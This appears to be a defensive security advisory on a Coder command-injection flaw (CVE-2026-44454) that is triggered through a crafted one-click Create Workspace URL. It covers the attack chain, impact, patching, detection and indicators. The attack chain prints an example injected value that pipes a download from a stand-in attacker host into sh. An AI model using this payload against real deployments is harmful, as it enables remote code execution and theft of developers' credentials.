Coder vulnerable to workspace auto-creation via crafted URL parameters without user consent
A command injection vulnerability (CVE-2026-44454) in the Coder platform's `dotfiles` module allows arbitrary code execution in a user's workspace, exploitable via a one-click attack using the `mode=auto` feature on the Create Workspace page that automatically provisions a workspace with a malicious `param.dotfiles_uri` without user consent, leading to immediate arbitrary code execution and potential data compromise or lateral movement.
The Coder platform, a developer workspace environment, is affected by a critical command injection vulnerability (CVE-2026-44454) present in its dotfiles module within the coder/registry component. Disclosed by Aviv Donenfeld and published on 2026-07-02, this flaw arises because the module directly interpolates unsanitized user-provided dotfiles_uri values into shell commands, allowing for arbitrary code execution. This vulnerability is amplified by the mode=auto feature on the Create Workspace page of the coder/coder application (versions prior to 2.29.7, and 2.30.0 through 2.30.1), which enables a one-click attack. An authenticated user clicking a specially crafted URL can trigger silent workspace creation with a malicious dotfiles_uri, leading to immediate RCE within their provisioned workspace. The vulnerability impacts customer instances of Coder and can lead to compromise of developer environments and sensitive data.
Attack Chain
- An attacker crafts a malicious URL targeting a victim's Coder deployment, including
mode=autoand aparam.dotfiles_urivalue containing shell metacharacters and arbitrary commands (e.g.,foo$(curl https://attacker.example/x | sh).com). - The attacker delivers this URL to an authenticated Coder user (e.g., via email or messaging).
- The victim clicks the crafted URL, which directs their browser to the Coder Create Workspace page.
- Due to the
mode=autoparameter, the Coder platform bypasses the confirmation prompt and automatically initiates the creation of a new workspace, pre-filling parameters including the attacker-controlledparam.dotfiles_uri. - During the workspace provisioning process, the
dotfilesmodule incoder/registryattempts to process the provideddotfiles_uri. - The unsanitized
dotfiles_urivalue is directly expanded by a shell, leading to command injection and the execution of the attacker's arbitrary commands (e.g.,curl https://attacker.example/x | sh) within the context of the newly created workspace. - The attacker's arbitrary code gains execution inside the victim's workspace, establishing a foothold for further malicious activities.
- The attacker can then access Git credentials, secrets, workspace files, or perform lateral movement within the Coder environment, achieving the final objective.
Impact
Successful exploitation of CVE-2026-44454 leads to arbitrary code execution within the victim's Coder workspace. This can result in the compromise of sensitive data, including Git credentials, API keys, and other secrets stored within the development environment, as well as the exfiltration of source code and other workspace files. Depending on the privileges assigned to the compromised workspace, this could also provide a significant foothold for lateral movement into connected systems or cloud infrastructure. The "one-click" nature of the mode=auto amplification vector significantly lowers the bar for exploitation, requiring only that an authenticated user interacts with a malicious link, making it a severe threat to organizations utilizing the Coder platform.
Recommendation
- Patch Coder deployments immediately by upgrading
coder/coderto at least versionv2.29.7(ESR) orv2.30.2(mainline) to implement the consent dialog formode=autoand to apply the primary fix for CVE-2026-44454. - Deploy the provided Sigma rule to detect attempts at exploiting CVE-2026-44454 in webserver logs.
- Monitor webserver logs for
cs-uri-querycontainingmode=autoandparam.dotfiles_uriwith shell metacharacters, as identified in the Sigma rule. - Block the C2 domain
attacker.examplelisted in the IOC table at the DNS resolver and perimeter firewalls.
Detection coverage 1
Detects CVE-2026-44454 Exploitation — Coder Workspace Command Injection
highDetects CVE-2026-44454 exploitation - HTTP request to Coder's workspace creation endpoint with `mode=auto` and a `param.dotfiles_uri` containing shell command injection indicators. This targets the vulnerability in the dotfiles module combined with auto-creation.
Detection queries are available on the platform. Get full rules →
Indicators of compromise
1
domain
1
url
| Type | Value |
|---|---|
| domain | attacker.example |
| url | https://attacker.example/x |